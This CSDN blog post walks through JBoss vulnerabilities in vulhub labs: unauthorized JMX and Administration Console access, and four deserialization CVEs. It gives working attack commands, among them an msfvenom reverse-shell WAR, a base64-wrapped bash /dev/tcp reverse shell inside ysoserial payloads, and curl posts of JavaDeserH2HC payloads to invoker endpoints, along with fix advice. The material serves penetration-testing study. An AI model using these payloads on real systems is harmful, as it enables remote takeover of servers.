CVE重要漏洞复现之JBOSS漏洞合集

于 2025-03-17 12:13:41 发布
阅读量957 收藏 25
点赞数 22
分类专栏: java框架代码审计 CVE与重要漏洞复现 渗透测试 文章标签: CVE重要漏洞复现 JBOSS漏洞合集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/146309496
版权

文章目录

JBOSS漏洞合集

JBoss漏洞合集

JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。

JBoss有很多的有点,比如说:具有革命性的JMX为内核服务作为其总线结构,本身就是面向服务架构,具有统一的类装载器从而能够实现热部署和热邪在的能力,所以JBoss应用服务器是健壮的、高质量的,也具有良好的性能。2019年JBoss AS更名为WildFly。

一、JBoss未授权访问

1.JBoss6.x JMX Console未授权访问

1.1 环境搭建

服务器:CentOS7(IP:192.168.17.102)Jboss 6.x

攻击机:kali(IP:192.168.17.15)

使用vulhub的CVE-2017-12149漏洞环境

https://vulhub.org/#/environments/jboss/CVE-2017-12149/

进入到下载目录直接执行命令完成搭建

docker-compose up -d

访问目标网站即可

image-20221025154350949

1.2 生成war 木马

在msf里边生成war木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.17.15 LPORT=4444 -f war > shell.war

使用kali开启http服务

python3 -m http.server 80

接受反弹shell

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.17.15
set LPORT 4444
exploit
1.3 上传木马

因为是模拟未授权访问,所以使用密码先登录就可以了,密码是admin/vulhub

平时就存储在/server/default/conf/props/jbossws-users.properties文件下

登陆进来选择service=MainDeployer

image-20221025154636506

下边选择两个deploy的里边任意一个就可以了,输入开启的web服务对应的war木马文件,也就是http://192.168.17.15/shell.war

image-20221025154714998

就上传成功了,开启kali监听然后访问目标就可以了,war里边的文件名是kali随机生成的

http://192.168.17.102:8080/shell/vbaulfplhl.jsp

image-20221025155001000

kali可以看到连接上来的目标服务器

image-20221025155410654

2.JBoss Administration Console未授权访问

2.1 环境搭建

服务器:CentOS7(IP:192.168.17.102)Jboss 6.x

攻击机:kali(IP:192.168.17.15)

使用vulhub的CVE-2017-12149漏洞环境

https://vulhub.org/#/environments/jboss/CVE-2017-12149/

进入到下载目录直接执行命令完成搭建

docker-compose up -d

访问目标网站即可

image-20221025160158556

2.2 上传木马

选择第一个Administration Console进去,因为是未授权访问所以输入一下账号和密码admin/vulhub

image-20221025160222909

登录到登陆界面,找到下边的Web Application(WAR)s

image-20221025160255924

可以看到上传war包,上传的时候保证这里是开启的

image-20221025160450844

也是直接上传访问

http://192.168.17.102:8080/shell/vbaulfplhl.jsp

就可以连接到kali

image-20221025160537334

二、JBoss反序列化漏洞

1.使用的反序列化工具

1.JavaDeserH2HC

https://github.com/joaomatosf/JavaDeserH2HC

2.ysoserial

https://github.com/frohoff/ysoserial

3.Deserialize

https://github.com/s0k/Deserialize

4.jexboss

https://github.com/joaomatosf/jexboss

这几个工具都可以用来生成反序列化的数据,在下面的反序列化漏洞中都是

ReadObject()触发反序列化漏洞,所以都可以使用cc5链进行利用。

2.反序列化的原理

前边已经分析过几条cc链的具体使用原理,我们就直接略过中间分析的部分,直接找到分序列化的入口点即可。

2.1 cve-2015-7501

此漏洞主要是由于JBoss中invoker/JMXInvokerServlet路径对外开放,由于JBoss的jmx组件支持Java反序列化,并且在反序列化过程中没有加入有效的安全检测机制,导致攻击者可以传入精心构造好的恶意序列化数据,在jmx对其进行反序列化处理时,导致传入的携带恶意代码的序列化数据执行,造成反序列化漏洞。

2.2cve-2017-7504

CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下,和cve-2015-7501一样,在反序列化的过程中没有加入有效的安全检测机制使攻击代码可以通过反序列化的方式执行。

2.3 cve-2017-12149

此漏洞主要是由于jbossserveralldeployhttpha-invoker.sarinvoker.warWEB-INFclassesorgjbossinvocationhttpservlet目录下的ReadOnlyAccessFilter.class文件中的doFilter方法,再将序列化传入ois中,并没有进行过滤便调用了readObject()进行反序列化,导致传入的携带恶意代码的序列化数据执行.image-20221027095359437

2.4 cve-2013-4810

此漏洞和CVE-2015-7501漏洞原理相同,web-console/Invoker利用的是org.jboss.console.remote.RemoteMBeanInvocation进行反序列化并上传构造的文件。

3.JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

3.1 环境搭建

服务器:CentOS7(IP:192.168.17.102)Jboss 4.x

攻击机:kali(IP:192.168.17.15)

使用vulhub的CVE-2017-12149漏洞环境

https://vulhub.org/#/environments/jboss/CVE-2017-7504/

进入到下载目录直接执行命令完成搭建

docker-compose up -d

访问目标网站即可

3.2 漏洞测试

访问下边网站

http://192.168.17.102:8080/jbossmq-httpil/HTTPServerILServlet

看到显示如下说明漏洞存在

image-20221026162345151

3.3使用ysoserial生成payload
bash -i >& /dev/tcp/192.168.17.15/7777 0>&1

base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjE1Lzc3NzcgMD4mMQ==

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjE1Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}

生成反序列化payload

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjE1Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}" > hack.ser

使用curl上传内容

curl http://192.168.17.102:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @hack.ser

在kali 监听7777即可获取反弹shell

image-20221026115634584

image-20221026115644127

3.4 使用JavaDeserH2HC生成payload

1.编译class文件

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2.生成反序列化payload

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.17.15:7777

3.curl 提交payload

curl http://192.168.17.102:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

kali 监听即可获得反弹shell

image-20221026163211502

image-20221026163308614

3.5 修复建议

因为这类的反序列化都依赖于InvokerTransformer类。如果用户在正常业务中不使用此类,可以将此类移除。方法为使用Winzip打开jar文件,在org/apache/commons/collections/functors/InvokerTransformer.class删除该文件。

或者升级JBoss到最新版本。

4.cve-2015-7501

4.1环境搭建

服务器:CentOS7(IP:192.168.17.102)Jboss 6.x

攻击机:kali(IP:192.168.17.15)

使用vulhub的CVE-2017-12149漏洞环境

https://vulhub.org/#/environments/jboss/CVE-2017-12149/

进入到下载目录直接执行命令完成搭建

docker-compose up -d

访问目标网站即可

4.2 漏洞测试

访问下边的网站

http://192.168.17.102:8080/invoker/JMXInvokerServlet

出现下载界面说明漏洞存在

image-20221026164055748

4.3 使用JavaDeserH2HC生成payload

同上,生成payload提交即可

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.17.15:7777

curl http://192.168.17.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

kali监听收到反弹shell

4.4 修复建议

因为这类的反序列化都依赖于InvokerTransformer类。如果用户在正常业务中不使用此类,可以将此类移除。方法为使用Winzip打开jar文件,在org/apache/commons/collections/functors/InvokerTransformer.class删除该文件。

或者升级JBoss到最新版本。

5.JBoss 5.x/6.x反序列化(cve-2017-12149)

5.1 环境搭建

服务器:CentOS7(IP:192.168.17.102)Jboss 6.x

攻击机:kali(IP:192.168.17.15)

使用vulhub的CVE-2017-12149漏洞环境

https://vulhub.org/#/environments/jboss/CVE-2017-12149/

进入到下载目录直接执行命令完成搭建

docker-compose up -d

访问目标网站即可

5.2 漏洞测试

漏洞出现在http invoker组件里边的ReadOnlyAccessFilter,访问

http://192.168.17.102:8080/invoker/readonly

出现界面如下说明漏洞存在

image-20221026164640435

5.3 使用JavaDeserH2HC生成payload

同上,生成payload提交即可

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.17.15:7777

curl http://192.168.17.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

使用kali监听收到反弹shell

image-20221025103433685

image-20221026164829340

5.4 修复建议

删除http-invoker.sar组件,路径如下jboss-6.1.0.Final\server\default\deploy\http-invoker.sar,或者升级JBoss到最新版本。

6.JBoss EJBInvokerServlet反序列化(cve-2013-4810)

6.1环境搭建

服务器:CentOS7(IP:192.168.17.102)Jboss 6.x

攻击机:kali(IP:192.168.17.15)

使用vulhub的CVE-2017-12149漏洞环境

https://vulhub.org/#/environments/jboss/CVE-2017-12149/

进入到下载目录直接执行命令完成搭建

docker-compose up -d

访问目标网站即可

6.2 漏洞测试

访问

http://192.168.17.102:8080/invoker/EJBInvokerServlet

出现下载说明漏洞存在

image-20221026164950561

6.3 使用JavaDeserH2HC生成payload
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.17.15:7777

curl http://192.168.17.102:8080/invoker/EJBInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

使用kali监听得到反弹shell

6.4 修复建议

因为这类的反序列化都依赖于InvokerTransformer类。如果用户在正常业务中不使用此类,可以将此类移除。方法为使用Winzip打开jar文件,在org/apache/commons/collections/functors/InvokerTransformer.class删除该文件。

或者升级JBoss到最新版本。

网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 348
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
漏洞复现Jboss反序列化漏洞CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 981
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4599
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
JBOSS未授权访问漏洞利用
Fuzz
02-25 686
1. 环境搭建 https://www.cnblogs.com/chengNo1/p/14297387.html 搭建好vulhub平台后 进入对应漏洞目录 cd vulhub/jboss/CVE-2017-7504/ 开启环境 docker-compose up -d 2. 访问 http://172.16.12.15:8080/ 进入后台。点击JMX Console 3. 漏洞利用工具 1、下载地址:https://github.com/joaomatosf/jexboss 2、cd jexboss
JBOSS的一些漏洞
p656456564545的专栏
01-12 2024
http://olms.sinopec.com:80/invoker/JMXInvokerServlet http://edcard.sinopec.com:80/invoker/JMXInvokerServlet 还有一个就是未授权的访问
jboss漏洞复现
赵花花08042的博客
12-13 779
JBoss JMXInvokerServlet 反序列化漏洞 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ https://paper.seebug.org/312/ https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的
深入浅出带你学习JBoss中间件常见漏洞
qq_44005305的博客
01-02 2313
本文给大家带来的是JBOSS中间件漏洞的总结,详细讲解一下JBOSS中间件的常见漏洞以及利用方法,本文就着JBOSS中间件的特性来分析该中间件的常见漏洞利用方式,下面我们展开文章来讲。简单来说可以介绍为一个开源的符合J2EE规范的应用服务器,作为J2EE规范的补充,Jboss中引入了AOP框架,为普通Java类提供了J2EE服务,而无需遵循EJB规范。该中间件的特点如下:它将具有革命性的JMX微内核服务作为其总线结构;
漏洞复现JBoss(CVE-2017-12149)反序列化漏洞
李火火的安全圈
03-24 658
文章目录声明前言一、漏洞描述二、漏洞原理三、漏洞分析JBoss反序列化漏洞分析四、影响版本五、漏洞利用实战复现六、漏洞修复修复原理方法一方法二方法三 声明 本篇文章仅用于漏洞研究和技术学习,切勿用于未授权下的渗透测试行为,切记! 前言 JBoss 存在反序列化漏洞,攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危。 一、漏洞描述 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 在 /invoker/readonly 路径下
漏洞复现Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504
weixin_45556536的博客
11-12 916
Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504基础知识漏洞原理影响版本复现思路复现CVE-2017-121491、特征检测2、反弹shell复现CVE-2017-75041、特征检测2、反弹shell 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObj
jboss安全漏洞修补方法
03-01
帮助修补JBOSS安全漏洞,防止别人黑进你的服务器。
记录Jboss的一次漏洞利用复现过程
qq1325928591的博客
07-14 403
# Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。本次测试为JBOSS后台文件上传漏洞,利用的是JBOSS的靶场环境* 服务器探测发现 如果在日常渗透的过程中可使用fofa,shodan,谷歌语法等进行探测发现 例如:app=“jboss” inurl:8080/jmx-console/ 均可探测出相关服务器 漏洞利用 利用弱密码进入JBoss后台进行文件上传的漏洞 链接形式;http://x.x.x.x:8080/ 主要是利用8080,9999.9990## 标题等相关端口 该页面则为
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2440
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Jboss 常见的几种漏洞
最新发布
网安小白
08-06 839
这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏。
一个伪黑客的成功的秘密2:Jboss入侵
weixin_34294649的博客
11-10 182
咱们前面分享了TOMCAT入侵的一点小小经验。下面咱们分享一下最常见和简单的Jboss入侵。Jboss一个基于J2EE的开放源代码的应用服务器,JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。JBoss的默认端口是8080 ,也有人经常配置为80,许多管理员部署完Jboss后不进行安全加固,对外开放...
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
漏洞复现JBoss漏洞总结
qq_45751902的博客
10-31 1817
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 8027
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
Jboss反序列化远程代码执行漏洞CVE-2017-12149)
weixin_46411728的博客
08-28 1823
Jboss反序列化远程代码执行漏洞CVE-2017-12149)
cve20201938漏洞复现
05-16
cve20201938漏洞是指微软...在复现漏洞后,及时进行修复,以免更严重的黑客攻击。 总的来说,漏洞复现对于保护系统安全非常重要,有助于及时发现漏洞并予以修复。希望我们大家都能重视系统安全,做好必要的防护措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值